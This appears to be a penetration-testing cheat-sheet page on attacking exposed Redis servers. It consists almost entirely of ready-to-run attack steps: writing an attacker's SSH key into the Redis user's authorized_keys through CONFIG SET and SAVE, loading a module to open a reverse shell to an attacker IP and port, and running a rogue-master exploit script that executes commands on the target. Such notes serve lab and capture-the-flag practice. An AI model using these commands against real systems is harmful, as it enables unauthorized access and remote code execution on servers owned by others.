redis exploits

Config get dir Exploit

Note : need to know home of redis user

# redis-cli -h <IP>
> config get dir
1) "dir"
2) "/var/lib/redis"

# ssh-keygen -f id_rsa
# 3 spaces before and after key: (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_id_rsa.txt
# cat spaced_id_rsa.txt| redis-cli -h IP -x set kashz
OK
> config set dir .ssh
OK
> config get dir
"/var/lib/redis/.ssh"
> config set dbfilename "authorized_keys"
OK
> save
OK
# ssh using id_rsa and user

load module

# need to be able to write module to target and know path of write file

# revere shell
system.rev IP PORT

master-slave exploit

https://github.com/vulhub/redis-rogue-getshell

python3 redis-master.py -r IP -p 6379 -L KALI_IP -P 27017 -f RedisModulesSDK/exp.so -c "id"

Previousrconfig management Nextrejetto httpfileserver

Last updated 2 years ago